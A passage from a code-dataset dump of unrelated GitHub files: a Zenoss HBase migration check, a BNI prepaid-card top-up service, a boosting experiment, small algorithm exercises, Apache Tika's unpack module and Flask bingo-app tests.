The reader services should be\n # edited.\n opentsdbs = [i for i in ctx.services if i.name == 'opentsdb' ]\n readers = [i for i in ctx.services if i.name == 'reader' and\n ctx.getServiceParent(i) in opentsdbs]\n\n changed = False\n\n for reader in readers:\n reader.prereqs = [sm.Prereq(name='HBase Regionservers up', script='{{with $rss := (child (child (parent (parent .)) \"HBase\") \"RegionServer\").Instances }}wget -q -O- http://localhost:61000/status/cluster | grep \\'{{$rss}} live servers\\'{{end}}'), sm.Prereq(name='HBase tables exist', script='wget -q -O- http://localhost:61000 | [[ $(grep -c -E -o \\\"\\\\b${CONTROLPLANE_TENANT_ID}-tsdb(-|\\\\s|$)\\\") == 4 ]]')]\n changed = True\n\n if changed:\n ctx.commit()\n\nCheckHBaseTablesExist()\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenModel/migrate/checkHBaseTablesExist.py","file_name":"checkHBaseTablesExist.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"74333296513","text":"__author__ = \"fitrah.wahyudi.imam@gmail.com\"\n\nimport logging\nfrom PyQt5.QtCore import QObject, pyqtSignal\nfrom _nNetwork import _NetworkAccess\nfrom _dDevice import _QPROX\nfrom _cConfig import _Common\nfrom _tTools import _Helper\nfrom time import sleep\nfrom _cCommand import _Command\n\n\nclass TopupSignalHandler(QObject):\n __qualname__ = 'TopupSignalHandler'\n SIGNAL_DO_TOPUP_BNI = pyqtSignal(str)\n\n\nTP_SIGNDLER = TopupSignalHandler()\nLOGGER = logging.getLogger()\n\nTOPUP_URL = _Common.TOPUP_URL\nTOPUP_TOKEN = _Common.TOPUP_TOKEN\nTOPUP_MID = _Common.TOPUP_MID\n# TOPUP_TID = '0123456789abcdefghijkl' -> Change Using Terminal ID\nTOPUP_TID = _Common.TID\n# ==========================================================\n\n\ndef start_define_topup_slot_bni():\n _Helper.get_pool().apply_async(define_topup_slot_bni)\n\n\nBNI_UPDATE_BALANCE_PROCESS = False\n\n\ndef define_topup_slot_bni():\n while True:\n if not BNI_UPDATE_BALANCE_PROCESS:\n if _Common.BNI_SAM_1_WALLET <= _Common.MINIMUM_AMOUNT:\n LOGGER.debug(('START_BNI_SAM_AUTO_UPDATE_SLOT_1', str(_Common.MINIMUM_AMOUNT), str(_Common.BNI_SAM_1_WALLET)))\n TP_SIGNDLER.SIGNAL_DO_TOPUP_BNI.emit('INIT_TOPUP_BNI_1')\n do_topup_bni(slot=1, force=True)\n if _Common.BNI_SINGLE_SAM is False and _Common.BNI_SAM_2_WALLET <= _Common.MINIMUM_AMOUNT:\n LOGGER.debug(('START_BNI_SAM_AUTO_UPDATE_SLOT_2', str(_Common.MINIMUM_AMOUNT), str(_Common.BNI_SAM_2_WALLET)))\n TP_SIGNDLER.SIGNAL_DO_TOPUP_BNI.emit('INIT_TOPUP_BNI_2')\n do_topup_bni(slot=2, force=True)\n sleep(5)\n\n\ndef start_do_topup_bni(slot):\n _Helper.get_pool().apply_async(do_topup_bni, (int(slot),))\n\n\ndef start_do_force_topup_bni():\n slot = _Common.BNI_ACTIVE\n force = True\n _Helper.get_pool().apply_async(do_topup_bni, (int(slot), force, ))\n\n\ndef do_topup_bni(slot=1, force=False):\n global BNI_UPDATE_BALANCE_PROCESS\n try:\n if force is False and _Common.ALLOW_DO_TOPUP is False:\n LOGGER.warning(('do_topup_bni', slot, _Common.ALLOW_DO_TOPUP))\n return 'TOPUP_NOT_ALLOWED'\n _get_card_data = _QPROX.get_card_info(slot=slot)\n if _get_card_data is False:\n TP_SIGNDLER.SIGNAL_DO_TOPUP_BNI.emit('FAILED_GET_CARD_INFO_BNI')\n _Common.upload_topup_error(slot, 'ADD')\n return 'FAILED_GET_CARD_INFO_BNI'\n BNI_UPDATE_BALANCE_PROCESS = True\n _Common.BNI_ACTIVE_WALLET = 0\n _result_pending = pending_balance({\n 'card_no': _get_card_data['card_no'],\n 'amount': _Common.BNI_TOPUP_AMOUNT,\n 'card_tid': _Common.TID_BNI\n })\n if _result_pending is 
False:\n TP_SIGNDLER.SIGNAL_DO_TOPUP_BNI.emit('FAILED_PENDING_BALANCE_BNI')\n _Common.upload_topup_error(slot, 'ADD')\n return 'FAILED_PENDING_BALANCE_BNI'\n _result_ubal = update_balance({\n 'card_no': _get_card_data['card_no'],\n 'card_info': _get_card_data['card_info'],\n 'reff_no': _result_pending['reff_no']\n })\n if _result_ubal is False:\n TP_SIGNDLER.SIGNAL_DO_TOPUP_BNI.emit('FAILED_UPDATE_BALANCE_BNI')\n _Common.upload_topup_error(slot, 'ADD')\n return 'FAILED_UPDATE_BALANCE_BNI'\n _send_crypto = _QPROX.send_cryptogram(_get_card_data['card_info'], _result_ubal['dataToCard'], slot=slot)\n if _send_crypto is False:\n TP_SIGNDLER.SIGNAL_DO_TOPUP_BNI.emit('FAILED_SEND_CRYPTOGRAM_BNI')\n _Common.upload_topup_error(slot, 'ADD')\n return 'FAILED_SEND_CRYPTOGRAM_BNI'\n else:\n BNI_UPDATE_BALANCE_PROCESS = False\n TP_SIGNDLER.SIGNAL_DO_TOPUP_BNI.emit('SUCCESS_TOPUP_BNI')\n _Common.upload_topup_error(slot, 'RESET')\n return 'SUCCESS_TOPUP_BNI'\n except Exception as e:\n LOGGER.warning(('do_topup_bni', str(slot), str(e)))\n TP_SIGNDLER.SIGNAL_DO_TOPUP_BNI.emit('FAILED_TOPUP_BNI')\n\n\ndef do_reset_pending_master():\n slot = 1\n _Helper.get_pool().apply_async(reset_pending_balance, (slot,))\n\n\ndef do_reset_pending_slave():\n slot = 2\n _Helper.get_pool().apply_async(reset_pending_balance, (slot,))\n\n\ndef reset_pending_balance(slot=1):\n try:\n _get_card_data = _QPROX.get_card_info(slot=slot)\n if _get_card_data is False:\n return 'FAILED_GET_CARD_INFO_BNI'\n _result_pending = pending_balance({\n 'card_no': _get_card_data['card_no'],\n 'amount': '10',\n 'card_tid': _Common.TID_BNI,\n 'activation': '1'\n })\n if _result_pending is False:\n _Common.upload_topup_error(slot, 'ADD')\n return 'FAILED_PENDING_BALANCE_BNI'\n _result_ubal = update_balance({\n 'card_no': _get_card_data['card_no'],\n 'card_info': _get_card_data['card_info'],\n 'reff_no': _result_pending['reff_no']\n })\n if _result_ubal is False:\n _Common.upload_topup_error(slot, 'ADD')\n return 'FAILED_UPDATE_BALANCE_BNI'\n _send_crypto = _QPROX.send_cryptogram(_get_card_data['card_info'], _result_ubal['dataToCard'], slot=slot)\n if _send_crypto is False:\n _Common.upload_topup_error(slot, 'ADD')\n return 'FAILED_SEND_CRYPTOGRAM_BNI'\n else:\n _Common.upload_topup_error(slot, 'RESET')\n _Common.ALLOW_DO_TOPUP = True\n return 'SUCCESS_RESET_PENDING_BNI'\n except Exception as e:\n LOGGER.warning(('reset_pending_balance', str(slot), str(e)))\n return False\n\n\ndef pending_balance(_param, bank='BNI', mode='TOPUP'):\n if bank == 'BNI' and mode == 'TOPUP':\n try:\n # param must be\n # \"token\":\"<>\",\n # \"mid\":\"<>\",\n # \"tid\":\"<>\",\n # \"amount\":\"30000\",\n # \"card_no\":\"7546990000025583\"\n # ---> Need Card Number And Amount\n _param['token'] = TOPUP_TOKEN\n _param['mid'] = TOPUP_MID\n _param['tid'] = TOPUP_TID\n status, response = _NetworkAccess.post_to_url(url=TOPUP_URL + 'v1/topup-bni/pending', param=_param)\n LOGGER.debug(('pending_balance', str(_param), str(status), str(response)))\n if status == 200 and response['response']['code'] == 200:\n # {\n # \"response\":{\n # \"code\":200,\n # \"message\":\"Pending Balance Success\",\n # \"latency\":2.2753360271454\n # },\n # \"data\":{\n # \"amount\":\"30000\",\n # \"card_no\":\"7546990000025583\",\n # \"reff_no\":\"20181207180324000511\",\n # \"provider_id\":\"BNI_TAPCASH\",\n # \"trx_pin\":\"12345\"\n # }\n # }\n return response['data']\n else:\n return False\n except Exception as e:\n LOGGER.warning((bank, mode, e))\n return False\n else:\n LOGGER.warning(('Unknown', 
bank, mode))\n return False\n\n\ndef update_balance(_param, bank='BNI', mode='TOPUP'):\n if bank == 'BNI' and mode == 'TOPUP':\n try:\n # param must be\n # \"token\":\"<>\",\n # \"mid\":\"<>\",\n # \"tid\":\"<>\",\n # \"reff_no\":\"20181207180324000511\",\n # \"card_info\":\"0001754699000002558375469900000255835A929C0E8DCEC98A95A574DE68D93CBB0\n # 00000000100000088889999040000002D04C36E88889999040000002D04C36E000000000000000000\n # 0079EC3F7C7EED867EBC676CD434082D2F\",\n # \"card_no\":\"7546990000025583\"\n # ---> Need Card Number, Card Info, Reff_No\n _param['token'] = TOPUP_TOKEN\n _param['mid'] = TOPUP_MID\n _param['tid'] = TOPUP_TID\n status, response = _NetworkAccess.post_to_url(url=TOPUP_URL + 'v1/topup-bni/update', param=_param)\n LOGGER.debug(('update_balance', str(_param), str(status), str(response)))\n if status == 200 and response['response']['code'] == 200:\n # {\n # \"response\":{\n # \"code\":200,\n # \"message\":\"Update Balance Success\",\n # \"latency\":1.4313230514526\n # },\n # \"data\":{\n # \"amount\":\"30000\",\n # \"auth_id\":\"164094\",\n # \"dataToCard\":\"06015F902D04C57100000000000000001C54522709845B42F240343E96F11041\"\n # }\n # _Common.ALLOW_DO_TOPUP = True\n return response['data']\n else:\n _Common.ALLOW_DO_TOPUP = False\n return False\n except Exception as e:\n LOGGER.warning((bank, mode, e))\n return False\n else:\n LOGGER.warning(('Unknown', bank, mode))\n return False\n\n\ndef reversal_balance(_param, bank='BNI', mode='TOPUP'):\n if bank == 'BNI' and mode == 'TOPUP':\n try:\n # param must be\n # \"token\":\"<>\",\n # \"mid\":\"<>\",\n # \"tid\":\"<>\",\n # \"card_no\":\"7546990000025583\",\n # \"amount\":\"30000\",\n # \"auth_id\":\"164094\",\n # \"card_data\":\"06015F902D04C57100000000000000001C54522709845B42F240343E96F11041\"\n # ---> Need Card Number, Card Data, Amount, Auth ID\n _param['token'] = TOPUP_TOKEN\n _param['mid'] = TOPUP_MID\n _param['tid'] = TOPUP_TID\n status, response = _NetworkAccess.post_to_url(url=TOPUP_URL + 'v1/topup-bni/reversal', param=_param)\n LOGGER.debug(('reversal_balance', str(_param), str(status), str(response)))\n if status == 200 and response['response']['code'] == 200:\n # {\n # \"response\":{\n # \"code\":200,\n # \"message\":\"Reversal Balance Success\",\n # \"latency\":2.8180389404297\n # },\n # \"data\":{\n # \"card_no\":\"7546990000025583\",\n # \"amount\":\"30000\"\n # }\n # }\n return response['data']\n else:\n return False\n except Exception as e:\n LOGGER.warning((bank, mode, e))\n return False\n else:\n LOGGER.warning(('Unknown', bank, mode))\n return False\n\n\ndef start_master_activation_bni():\n slot = 1\n _Helper.get_pool().apply_async(refill_zero_bni, (slot,))\n\n\ndef start_slave_activation_bni():\n slot = 2\n _Helper.get_pool().apply_async(refill_zero_bni, (slot,))\n\n\ndef refill_zero_bni(slot=1):\n _slot = slot - 1\n param = _QPROX.QPROX['REFILL_ZERO'] + '|' + str(_slot) + '|' + _QPROX.TID_BNI\n response, result = _Command.send_request(param=param, output=None)\n if response == 0:\n _Common.NFC_ERROR = ''\n _QPROX.QP_SIGNDLER.SIGNAL_REFILL_ZERO.emit('REFILL_ZERO|SUCCESS')\n sleep(2)\n reset_pending_balance(slot=slot)\n else:\n if slot == 1:\n _Common.NFC_ERROR = 'REFILL_ZERO_SLOT_1_BNI_ERROR'\n if slot == 2:\n _Common.NFC_ERROR = 'REFILL_ZERO_SLOT_2_BNI_ERROR'\n 
_QPROX.QP_SIGNDLER.SIGNAL_REFILL_ZERO.emit('REFILL_ZERO_ERROR')\n\n\n","repo_name":"ciwanridwan/Unified-Vm","sub_path":"_sService/_TopupService.py","file_name":"_TopupService.py","file_ext":"py","file_size_in_byte":11456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"40823923032","text":"import unittest\nfrom tests.unit_test_helper.console_test_helper import *\n\n\nclass TestOutput(unittest.TestCase):\n\n def test(self):\n temp_globals, temp_locals, content, output = execfile(\"lab16/ch016_t11_practice_makes_perfect.py\")\n self.assertListEqual([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21],\n temp_locals['to_21'])\n self.assertListEqual([1, 3, 5, 7, 9, 11, 13, 15, 17, 19, 21], temp_locals['odds'])\n self.assertListEqual([8, 9, 10, 11, 12, 13, 14], temp_locals['middle_third'])\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"wongcyrus/ite3101_introduction_to_programming","sub_path":"tests/lab16/test_ch016_t11_practice_makes_perfect.py","file_name":"test_ch016_t11_practice_makes_perfect.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"39821981557","text":"from time import time\nimport os\n\nimport pandas as pd\nimport numpy as np\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import ensemble\nfrom sklearn import tree\nfrom sklearn.preprocessing import OneHotEncoder, LabelEncoder\nfrom sklearn.metrics import accuracy_score\n\nimport generate_plots as gp\n\n# EVIL CODE\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nroot_path = os.getcwd()\n\nprint(\"########## Importing Data... ##########\")\n\n# census data\nadult_df = pd.read_csv(\"data/census_data/adult.data\")\nadult_df.dropna(inplace=True)\nadult_test_df = pd.read_csv(\"data/census_data/adult.test\")\nadult_test_df.dropna(inplace=True)\n\n# flag data\nflag_df = pd.read_csv(\"data/flag_data/flag.data\")\nflag_df.dropna(inplace=True)\n\nprint(\"########## Splitting Data... ##########\")\nadult_x = adult_df.drop(['income'], axis=1)\n# adult_x = adult_df\nadult_y = adult_df['income']\nadult_y = adult_y.to_frame()\nadult_tst_x = adult_test_df.drop(['income'], axis=1)\n# adult_tst_x = adult_test_df\nadult_tst_y = adult_test_df['income']\nadult_tst_y = adult_tst_y.to_frame()\n\nflag_x = flag_df.drop(['religion'], axis=1)\nflag_y = flag_df['religion']\nflag_x, flag_tst_x, flag_y, flag_tst_y = train_test_split(flag_df,\n flag_y,\n test_size=0.33)\n\nprint(\"########## One-hot encoding... 
##########\")\ncategorical_feature_mask = (adult_x.dtypes == object)\ncategorical_cols = adult_x.columns[categorical_feature_mask].tolist()\ncolumn_mask = []\nfor column_name in list(adult_x.columns.values):\n column_mask.append(column_name in categorical_cols)\n\nohe = OneHotEncoder(categorical_features=column_mask, handle_unknown='ignore')\nfor col in categorical_cols:\n le = LabelEncoder()\n adult_x[col] = le.fit_transform(adult_x[col])\n adult_tst_x[col] = le.fit_transform(adult_tst_x[col])\nadult_x = ohe.fit_transform(adult_x)\nadult_tst_x = ohe.transform(adult_tst_x)\n\n\ncategorical_feature_mask = (flag_x.dtypes == object)\ncategorical_cols = flag_x.columns[categorical_feature_mask].tolist()\ncolumn_mask = []\nfor column_name in list(flag_x.columns.values):\n column_mask.append(column_name in categorical_cols)\n\nohe = OneHotEncoder(categorical_features=column_mask, handle_unknown='ignore')\nfor col in categorical_cols:\n le = LabelEncoder()\n flag_x[col] = le.fit_transform(flag_x[col])\n flag_tst_x[col] = le.fit_transform(flag_tst_x[col])\nflag_x = ohe.fit_transform(flag_x)\nflag_tst_x = ohe.transform(flag_tst_x)\n\nprint(\"########## Plotting Learning Curves... ##########\")\nboost_adult = ensemble.AdaBoostClassifier()\nboost_flag = ensemble.AdaBoostClassifier(learning_rate=0.8, n_estimators=10)\n\nstart_time = time()\n\ndt_adult_final = tree.DecisionTreeClassifier(max_depth=7, max_leaf_nodes=5)\nboost_adult_final = ensemble.AdaBoostClassifier(base_estimator=dt_adult_final, learning_rate=1.1, n_estimators=100)\nboost_adult_final.fit(adult_x.todense(), adult_y.values.ravel())\nadult_pred_y = boost_adult_final.predict(adult_tst_x.todense())\nprint(\"Adult boosting accuracy: {}\".format(accuracy_score(adult_tst_y, adult_pred_y)))\n\nprint(\"Time elapsed: {}\".format(time() - start_time))\nstart_time = time()\n\nboost_flag_final = ensemble.AdaBoostClassifier(learning_rate=0.8, n_estimators=10)\nboost_flag_final.fit(flag_x.todense(), flag_y.ravel())\nflag_pred_y = boost_flag_final.predict(flag_tst_x.todense())\nprint(\"Flag boosting accuracy: {}\".format(accuracy_score(flag_tst_y, flag_pred_y)))\n\nprint(\"Time elapsed: {}\".format(time() - start_time))\n\n\nfig_adult_lc = gp.plot_learning_curve(boost_adult,\n \"Adult - learning curve\",\n adult_x.todense(),\n adult_y.values.ravel(), cv=3,\n train_sizes=np.linspace(0.1, 1.0, 40))\nfig_adult_lc.savefig(root_path + \"/plots/boost/adult_lc.png\")\n\nfig_flag_lc = gp.plot_learning_curve(boost_flag,\n \"Flag - learning curve\",\n flag_x.todense(),\n flag_y.values.ravel(), cv=3,\n train_sizes=np.linspace(0.1, 1.0, 40))\nfig_flag_lc.savefig(root_path + \"/plots/boost/flag_lc.png\")\n\nprint(\"########## Plotting n_estimators Validation Curves... ##########\")\nfig_adult_vc1 = gp.plot_validation_curve(boost_adult,\n \"Adult - n_estimators Validation Curve\",\n adult_x.todense(),\n adult_y.values.ravel(),\n param_name=\"n_estimators\",\n param_range=range(1, 100, 2),\n cv=5)\nfig_adult_vc1.savefig(root_path + \"/plots/boost/n_estimators_adult_vc.png\")\n\nfig_flag_vc1 = gp.plot_validation_curve(boost_flag,\n \"Flag - n_estimators Validation Curve\",\n flag_x.todense(),\n flag_y.values.ravel(),\n param_name=\"n_estimators\",\n param_range=range(1, 100),\n cv=5)\nfig_flag_vc1.savefig(root_path + \"/plots/boost/n_estimators_flag_vc.png\")\n\nprint(\"########## Plotting learning_rate Validation Curves... 
##########\")\nfig_adult_vc2 = gp.plot_validation_curve(boost_adult,\n \"Adult - learning_rate Validation Curve\",\n adult_x.todense(),\n adult_y.values.ravel(),\n param_name=\"learning_rate\",\n param_range=np.linspace(0.1, 1.5, 25),\n cv=5)\nfig_adult_vc2.savefig(root_path + \"/plots/boost/learning_rate_adult_vc.png\")\n\nfig_flag_vc2 = gp.plot_validation_curve(boost_flag,\n \"Flag - learning_rate Validation Curve\",\n flag_x.todense(),\n flag_y.values.ravel(),\n param_name=\"learning_rate\",\n param_range=np.linspace(0.01, 1, 25),\n cv=5)\nfig_flag_vc2.savefig(root_path + \"/plots/boost/learning_rate_flag_vc.png\")\n\n\nprint(\"Time elapsed: {}\".format(time() - start_time))\n","repo_name":"jdeweerth/ml_submissions","sub_path":"submissions/supervised_learning/boost.py","file_name":"boost.py","file_ext":"py","file_size_in_byte":6592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41173184630","text":"#Challenge: Given an array and a number k where k is smaller than size of array, \n# we need to find the k’th smallest element in the given array. It is \n# given that array elements are distinct.\n\n#Idea: To modify quicksort algorithm to search for the kth smallest number\ndef partition(numbers, start, end):\n pivot = numbers[start]\n small_idx = start + 1\n for idx in range(start+1, end+1):\n if numbers[idx] < pivot:\n numbers[small_idx], numbers[idx] = numbers[idx], numbers[small_idx]\n small_idx += 1\n numbers[start], numbers[small_idx-1] = numbers[small_idx-1], numbers[start]\n return small_idx-1\n\ndef findKSmallestNumber(numbers, start, end, k):\n if start < end:\n pivot_idx = partition(numbers, start, end)\n if pivot_idx + 1 == k:\n return numbers[pivot_idx]\n elif pivot_idx + 1 > k:\n return findKSmallestNumber(numbers,start, pivot_idx-1, k)\n else:\n return findKSmallestNumber(numbers, pivot_idx+1, end, k)\n \nif __name__ == \"__main__\":\n assert findKSmallestNumber([7,10,4,3,20,15], 0, 5, 3) == 7\n print(\"===================================\")\n assert findKSmallestNumber([7,10,4,3,20,15], 0, 5, 4) == 10\n print(\"===================================\")\n assert findKSmallestNumber([12,3,5,7,19], 0, 4, 2) == 5\n ","repo_name":"edenuis/Python","sub_path":"Code Challenges/findKSmallestNumber.py","file_name":"findKSmallestNumber.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23387192521","text":"from sys import stdin\nimport numpy as np\n\n\n\n\nf = open('B-small-attempt0.txt','w')\nstdin = open('B-small-attempt0.in', 'r')\nT = int(stdin.next().strip())\nfor t in xrange(1,T+1):\n\tN, M = map(int, stdin.next().split())\n\tpattern = np.array([map(int, stdin.next().split()) for i in xrange(N)])\n\tlawn = np.empty([N,M])\n\t\n\tfor i in range(N):\n\t\tlawn[i,:] = np.max(pattern[i,:])\n\t\n\tfor j in range(M):\n\t\tif not (lawn[:,j] == pattern[:,j]).all():\n\t\t\tlawn[:,j] = np.max(pattern[:,j])\n\t\t\n\tresult = 'NO'\n\t\n\tif (lawn == pattern).all():\n\t\tresult = 'YES'\n\t\t\n\t#print 'Case #%d: %s' % (t, result)\t\t\t\n\tf.write(\"\"\"Case #\"\"\"), f.write(str(t)), f.write(\": \"), f.write(str(result)), f.write(\"\\n\")\n\nf.close()\t","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_117/1489.py","file_name":"1489.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
+{"seq_id":"40421544834","text":"from .tika import parse1, callServer, ServerEndpoint\nimport tarfile\nfrom io import BytesIO, TextIOWrapper\nimport csv\nfrom sys import version_info\nfrom contextlib import closing\n\n# Python 3 introduced .readable() to tarfile extracted files objects - this\n# is required to wrap a TextIOWrapper around the object. However, wrapping\n# with TextIOWrapper is only required for csv.reader() in Python 3, so the\n# tarfile returned object can be used as is in earlier versions.\n_text_wrapper = TextIOWrapper if version_info.major >= 3 else lambda x: x\n\n\ndef from_file(filename, serverEndpoint=ServerEndpoint, requestOptions={}):\n '''\n Parse from file\n :param filename: file\n :param serverEndpoint: Tika server end point (optional)\n :return:\n '''\n tarOutput = parse1('unpack', filename, serverEndpoint,\n responseMimeType='application/x-tar',\n services={'meta': '/meta', 'text': '/tika',\n 'all': '/rmeta/xml', 'unpack': '/unpack/all'},\n rawResponse=True, requestOptions=requestOptions)\n return _parse(tarOutput)\n\n\ndef from_buffer(string, serverEndpoint=ServerEndpoint, headers=None, requestOptions={}):\n '''\n Parse from buffered content\n :param string: buffered content\n :param serverEndpoint: Tika server URL (Optional)\n :return: parsed content\n '''\n\n headers = headers or {}\n headers.update({'Accept': 'application/x-tar'})\n\n status, response = callServer('put', serverEndpoint, '/unpack/all', string,\n headers, False,\n rawResponse=True, requestOptions=requestOptions)\n\n return _parse((status, response))\n\n\ndef _parse(tarOutput):\n parsed = {}\n if not tarOutput:\n return parsed\n elif tarOutput[1] is None or tarOutput[1] == b\"\":\n return parsed\n\n with tarfile.open(fileobj=BytesIO(tarOutput[1])) as tarFile:\n # get the member names\n memberNames = list(tarFile.getnames())\n\n # extract the metadata\n metadata = {}\n if \"__METADATA__\" in memberNames:\n memberNames.remove(\"__METADATA__\")\n\n metadataMember = tarFile.getmember(\"__METADATA__\")\n if not metadataMember.issym() and metadataMember.isfile():\n if version_info.major >= 3:\n with closing(_text_wrapper(tarFile.extractfile(metadataMember), encoding=tarFile.encoding)) as metadataFile:\n metadataReader = csv.reader(_truncate_nulls(metadataFile))\n for metadataLine in metadataReader:\n # each metadata line comes as a key-value pair, with list values\n # returned as extra values in the line - convert single values\n # to non-list values to be consistent with parser metadata\n assert len(metadataLine) >= 2\n\n if len(metadataLine) > 2:\n metadata[metadataLine[0]] = metadataLine[1:]\n else:\n metadata[metadataLine[0]] = metadataLine[1]\n else:\n with closing(_text_wrapper(tarFile.extractfile(metadataMember))) as metadataFile:\n metadataReader = csv.reader(_truncate_nulls(metadataFile))\n for metadataLine in metadataReader:\n # each metadata line comes as a key-value pair, with list values\n # returned as extra values in the line - convert single values\n # to non-list values to be consistent with parser metadata\n assert len(metadataLine) >= 2\n\n if len(metadataLine) > 2:\n metadata[metadataLine[0]] = metadataLine[1:]\n else:\n metadata[metadataLine[0]] = metadataLine[1]\n\n\n # get the content\n content = \"\"\n if \"__TEXT__\" in memberNames:\n memberNames.remove(\"__TEXT__\")\n\n contentMember = tarFile.getmember(\"__TEXT__\")\n if not contentMember.issym() and contentMember.isfile():\n if version_info.major >= 3:\n with closing(_text_wrapper(tarFile.extractfile(contentMember), 
encoding='utf8')) as content_file:\n content = content_file.read()\n else:\n with closing(tarFile.extractfile(contentMember)) as content_file:\n content = content_file.read().decode('utf8')\n\n # get the remaining files as attachments\n attachments = {}\n for attachment in memberNames:\n attachmentMember = tarFile.getmember(attachment)\n if not attachmentMember.issym() and attachmentMember.isfile():\n with closing(tarFile.extractfile(attachmentMember)) as attachment_file:\n attachments[attachment] = attachment_file.read()\n\n parsed[\"content\"] = content\n parsed[\"metadata\"] = metadata\n parsed[\"attachments\"] = attachments\n\n return parsed\n\n\n# TODO: Remove if/when fixed. https://issues.apache.org/jira/browse/TIKA-3070\ndef _truncate_nulls(s):\n for line in s:\n yield line.replace('\\0', '')\n","repo_name":"chrismattmann/tika-python","sub_path":"tika/unpack.py","file_name":"unpack.py","file_ext":"py","file_size_in_byte":5279,"program_lang":"python","lang":"en","doc_type":"code","stars":1359,"dataset":"github-code","pt":"61"} +{"seq_id":"29172486752","text":"import os\nimport tempfile\nfrom itertools import product\nimport pytest\nfrom freezegun import freeze_time\nfrom datetime import datetime, timedelta\nfrom random import randint\n\nfrom main import app, db\n\n\n@pytest.fixture\ndef client():\n db_fd, db_file = tempfile.mkstemp()\n app.config['DATABASE'] = \"sqlite:///\" + db_file\n app.config['TESTING'] = True\n with app.test_client() as client:\n with app.app_context():\n db.get_session() # Initialize db\n yield client\n\n os.close(db_fd)\n os.unlink(db_file)\n\n\ndef test_basic_functionality(client):\n \"\"\"Sanity test to see if everything works as intended\"\"\"\n with app.app_context():\n # Create a field\n with freeze_time(datetime.now()) as frozen_time:\n rv = client.post('/', data=dict(player_name=\"player\"))\n game_link = rv.location[-11:-1]\n session = db.get_session()\n game_pk = session.query(db.BingoField.id).filter(db.BingoField.link == game_link).one()[0]\n rv = client.get(f'/{game_link}/')\n assert b'Spieler: player' in rv.data\n # Wait 15 minutes\n frozen_time.tick(delta=timedelta(minutes=15))\n # Check middle\n rv = client.post(f'/{game_link}/submit/3/3/')\n assert {'data': 'success', 'x': 3, 'y': 3} == rv.get_json()\n # Check if it's submitted to the db\n square_time = session.query(db.BingoSquares.check_time).filter(\n db.BingoSquares.bingo_field_id == game_pk, db.BingoSquares.x_position == 3, db.BingoSquares.y_position == 3\n ).one()[0]\n assert square_time is not None\n # Wait 15 minutes\n frozen_time.tick(delta=timedelta(minutes=15))\n # Uncheck middle\n rv = client.post(f'/{game_link}/submit/3/3/undo/')\n assert {'data': 'success', 'x': 3, 'y': 3} == rv.get_json()\n # Check if it's submitted to the db\n square_time = session.query(db.BingoSquares.check_time).filter(\n db.BingoSquares.bingo_field_id == game_pk, db.BingoSquares.x_position == 3, db.BingoSquares.y_position == 3\n ).one()[0]\n assert square_time is None\n # Now randomly check a field every hour until we have a bingo\n bingo = False\n checked = []\n minutes_passed = 30\n while not bingo:\n frozen_time.tick(delta=timedelta(hours=1))\n minutes_passed += 60\n # Search for an unchecked field\n unchecked_field = False\n while not unchecked_field:\n x = randint(1, 5)\n y = randint(1, 5)\n if [x, y] not in checked:\n unchecked_field = True\n checked.append([x, y])\n # Check the field\n rv = client.post(f'/{game_link}/submit/{x}/{y}/')\n json_data = rv.get_json()\n # Check if it's submitted to the 
db\n square_time = session.query(db.BingoSquares.check_time).filter(\n db.BingoSquares.bingo_field_id == game_pk, db.BingoSquares.x_position == x,\n db.BingoSquares.y_position == y\n ).one()[0]\n assert square_time is not None\n\n if json_data['data'] == \"success\":\n assert {'data': 'success', 'x': x, 'y': y} == json_data\n elif json_data['data'] == \"finished\":\n assert {'data': 'finished', 'score': int(1000000 / minutes_passed)} == json_data\n # Check if the field is finished and the score is saved in the db\n game = session.query(db.BingoField).filter(db.BingoField.id == game_pk).one()\n assert game.finished\n assert game.score == int(1000000 / minutes_passed)\n # Finish the while-loop\n bingo = True\n\n\ndef test_timezone_submit(client):\n with app.app_context():\n # Test both DST time and non DST time\n for dst, tz_time in [[True, datetime(2019, 6, 15, 12)], [False, datetime(2019, 12, 15, 12)]]: # This is UTC time\n with freeze_time(tz_time) as frozen_time:\n # Create a field\n rv = client.post('/', data=dict(player_name=\"player\"))\n game_link = rv.location[-11:-1]\n session = db.get_session()\n game_pk = session.query(db.BingoField.id).filter(db.BingoField.link == game_link).one()[0]\n rv = client.get(f'/{game_link}/')\n assert b'Spieler: player' in rv.data\n # Check if the right tz is displayed CEST in DST CET otherwise\n if dst:\n assert b'Start-Zeit: 15.06.19 14:00 Uhr' in rv.data\n else:\n assert b'Start-Zeit: 15.12.19 13:00 Uhr' in rv.data\n # Check if the right tz was saved CEST in DST CET otherwise\n db_time = session.query(db.BingoField.start_time).filter(db.BingoField.id == game_pk).one()[0]\n if dst:\n assert db_time == tz_time + timedelta(hours=2)\n else:\n assert db_time == tz_time + timedelta(hours=1)\n # Wait an hour\n frozen_time.tick(delta=timedelta(hours=1))\n # Check a square\n rv = client.post(f'/{game_link}/submit/3/3/')\n assert {'data': 'success', 'x': 3, 'y': 3} == rv.get_json()\n rv = client.get(f'/{game_link}/')\n # Check if the right tz is displayed with the checked square\n if dst:\n assert b'
Zeit: 15.06.19 15:00 Uhr' in rv.data # Bingo Squares's html looks like this\n else:\n assert b'Zeit: 15.12.19 14:00 Uhr
